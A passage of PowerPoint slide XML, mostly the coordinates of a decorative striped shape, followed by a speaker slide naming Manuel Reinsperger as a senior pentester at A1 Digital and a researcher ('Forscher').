                  <a:pt x="16562297" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16682320" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7270551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="7390574"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16315263" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16435302" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7517569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="7637606"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16068233" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16188267" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7764603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="7884638"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15821221" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15941238" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="8011633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8131650"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15574192" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15694220" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="8258651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8378679"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15327180" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15447207" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8505661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8625689"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15080145" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15200170" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8752702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8872721"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14833116" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14953149" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8999720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9119756"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14586104" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14706120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9246752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9366768"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14339086" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14459130" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9493742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9613786"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14212090" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9740782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="9860812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14092059" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13845039" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13965055" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9987817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10107830"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13598021" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13718031" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10234840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10354848"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13350986" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13471011" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10481864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10601883"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13103968" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13224007" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10728865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10848900"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12856950" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12976972" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10975899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11095921"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12609915" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12729954" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11222918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11342956"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12482919" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11469952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11589974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12362900" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12115885" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12235893" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="11716979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11836986"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11868856" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11988883" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11963988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="12084013"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11621821" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11741860" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12211012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12331050"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11374809" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11494836" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="12458032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12578062"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11127791" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11247812" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12705058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12825080"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10880767" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11000806" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12952065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13072098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10633849" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10753760" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13199111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="13319020"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10386814" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10506853" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13446013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="13566054"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10139796" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10259827" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="13693044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13813075"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9892756" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10012795" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13940076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14060112"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9645743" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9765783" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14187086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14307125"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9518742" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14434132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14554143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9398728" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9151713" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9271725" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14681144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14801155"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9024712" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="14928159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15048200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8904671" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8657655" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8777672" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15175197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="15295213"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8410643" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8530654" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15422215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="15542226"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8163602" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8283639" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15669232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="15789269"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7916590" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8036596" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15916273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16036275"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7422526" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7542554" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16410317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16530345"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7175508" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7295525" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="16657344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16777363"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7789583" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16163288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16283322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7669550" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7048513" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16904359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17024381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928490" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6801500" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17151371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17271410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681461" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6554460" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="17398408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17518428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6434443" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6307442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17645423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="17765460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6187408" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6060407" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17892464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18012480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940390" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5813384" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18139487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18259515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5693356" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5566366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18386502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="18506524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5446343" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5319353" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18633514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="18753542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5199326" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5072318" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18880549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19000577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4952290" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4705278" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4825312" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19127556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19247592"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4458249" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4578277" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19374591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19494618"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4211226" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4331248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19621620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19741645"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3964196" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4084225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19868646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19988671"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3717195" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3837201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20115667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20235673"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3470149" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3590189" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="20362682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20482718"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3223131" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3343160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20609708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20729736"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2976102" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3096141" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20856726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20976765"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2729079" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2849118" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21103749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="21223789"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2482066" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2602083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21350784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21470802"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2235048" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2355065" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="21597805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21717820"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1988014" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2108052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="21844818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="21964858"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1740996" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1861012" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22091855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="22211876"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1493972" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1613989" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22338878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22458896"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1246949" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1366982" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="22585888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22705920"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="999919" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1119947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="22832918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22952949"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="752907" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="872924" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="23079945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23199961"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="505878" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="625905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23326960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23446990"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="258854" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="378882" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23573987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23694011"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11831" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23821007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="23941035"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DA291C">
              <a:alpha val="7490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400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Titel 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E7A55ED-A0BD-41C4-935D-29252A82F041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276000" y="487656"/>
            <a:ext cx="5220000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" dirty="0"/>
              <a:t>Manuel Reinsperger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Textplatzhalter 313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F47E57-A534-496B-BF60-65457758A93C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="2744924"/>
            <a:ext cx="5220612" cy="3329458"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t>Senior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t> A1 Digital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="A1 Sans"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forscher</a:t>
            </a:r>
            <a:r>
